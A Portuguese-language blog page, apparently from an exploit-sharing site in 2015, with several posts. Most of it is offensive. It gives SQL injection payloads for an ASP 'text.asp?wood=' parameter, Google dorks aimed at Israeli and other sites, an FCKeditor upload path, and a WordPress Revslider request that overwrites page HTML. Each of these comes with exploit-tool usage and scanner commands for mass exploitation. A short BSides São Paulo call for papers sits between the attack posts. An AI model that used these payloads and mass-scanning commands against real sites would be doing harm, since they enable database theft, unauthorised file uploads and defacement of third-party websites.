Exploit:      +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



DBMS: 'Microsoft Access'

Exploit:      +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16



  -----------------------------------------------------------------------------



http://target.us/text.asp?wood=(id)+Exploit



GOOGLE DORK:   inurl:"text.asp?wood="

GOOGLE DORK:   site:il inurl:"text.asp?wood="

GOOGLE DORK:   site:com inurl:"text.asp?wood="   



Exploit:




Execute exploit:

--help:

  -t : SET TARGET.

  -f : SET FILE TARGETS.

  -p : SET PROXY

  Execute:

  php WebDepoxpl.php -t target

  php WebDepoxpl.php -f targets.txt

  php WebDepoxpl.php -t target -p 'http://localhost:9090'



DOWNLOAD Exploit: http://pastebin.com/b6bWuw7k



  -----------------------------------------------------------------------------



EXPLOIT MASS USE SCANNER INURLBR

COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --command-all "php 0dayWebDepo.php -t '_TARGET_'"







EXPLOIT MASS USE SCANNER INURLBR COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"



DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR





VÍDEO 


  -----------------------------------------------------------------------------





A segunda falha:



Exploit fckeditor 2015

Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk  



GOOGLE DORK: inurl:"/text.asp?wood=" site:il



Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp







A segunda falha: Exploit fckeditor 2015  GOOGLE DORK: inurl:"/text.asp?wood=" site:il Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp







POC:

[1] - http://target.us/target-admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp




[2] - http://target.us/userfiles/file/{YOU_FILE}











By:



às





Nenhum comentário:

























Marcadores:
,
,
,
,
,
,

















quarta-feira, 25 de março de 2015













Aberto a Chamada de Trabalhos / Conferência O Outro Lado Security BSides São Paulo (Co0L BSidesSP) 












Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!



Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!



A "Conferência O Outro Lado Security BSides São Paulo" (Co0L BSidesSP) é uma mini-conferência gratuita organizada por profissionais envolvidos com o mercado de segurança da informação. O principal objetivo da Co0L BSidesSP é o de permitir a inovação, discussão e a troca de conhecimento sobre segurança da informação e cultura hacker, em um clima descontraído e dentro de uma abordagem aonde estas disciplinas se complementam.

A Co0L BSidesSP faz parte das conferências “Security BSides” (www.securitybsides.com) existentes em vários países, com propósito de fomentar a comunidade local de segurança e que acontecem em conjunto com algum grande evento da área.



A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015. https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN (English Version) As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes). Datas Importantes:



A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.




    

  1. https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
    2. 

  2. https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN (English Version)
    3. 




As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).

Datas Importantes:




    

  • - Data final para submissão de palestras e oficinas: 20/04
    • 

  • - Notificação aos autores selecionados: 23/03
    • 

  • - Divulgação da Agenda: 24/04
    • 

  • - Início das inscrições: 24/04
    • 

  • - Co0L BSidesSP v11: 24/05
    • 














By:



às





Um comentário:

























Marcadores:
,
,
,

















terça-feira, 24 de março de 2015













WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL












WORDPRESS EXPLOIT Revslider



Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 







Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 







Enviando a requisição:



Via post com seguintes campos:

array(



"action" => "revslider_ajax_action",



"client_action" => "update_captions_css",



 "data" => "_YOU_HTML_ADD_"



 );







Dentro no campo data é onde enviamos nosso HTML modificado.

Nossa array post com os dados já previamente preechidos são enviados para seguinte



URL - POST: http://{target}/wp-admin/admin-ajax.php







Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.



URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 







USANDO EXPLOIT : 

DOWNLOAD:  http://pastebin.com/a2LHiD7U



EXECUTE:

    -t : SET TARGET.

    -f : SET FILE TARGETS.

    -p : SET PROXY

    Execute:

         php exploit.php -t target

         php exploit.php -f targets

         php exploit.php -t target -p 'http://localhost:9090'











OUTPUT COMAND -t:



OUTPUT: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL





OUTPUT COMAND -f targets.txt:



OUTPUT COMAND -f targets.txt:









Usando em massa com SCANNER INURLBR:

DOWNLOAD:

https://github.com/googleinurl/SCANNER-INURLBR 



COMANDO:

./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'







OUTPUT:



OUTPUT: ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'










By:



às





5 comentários:

























Marcadores:
,
,
,
,
,
,























Assinar:
Postagens (Atom)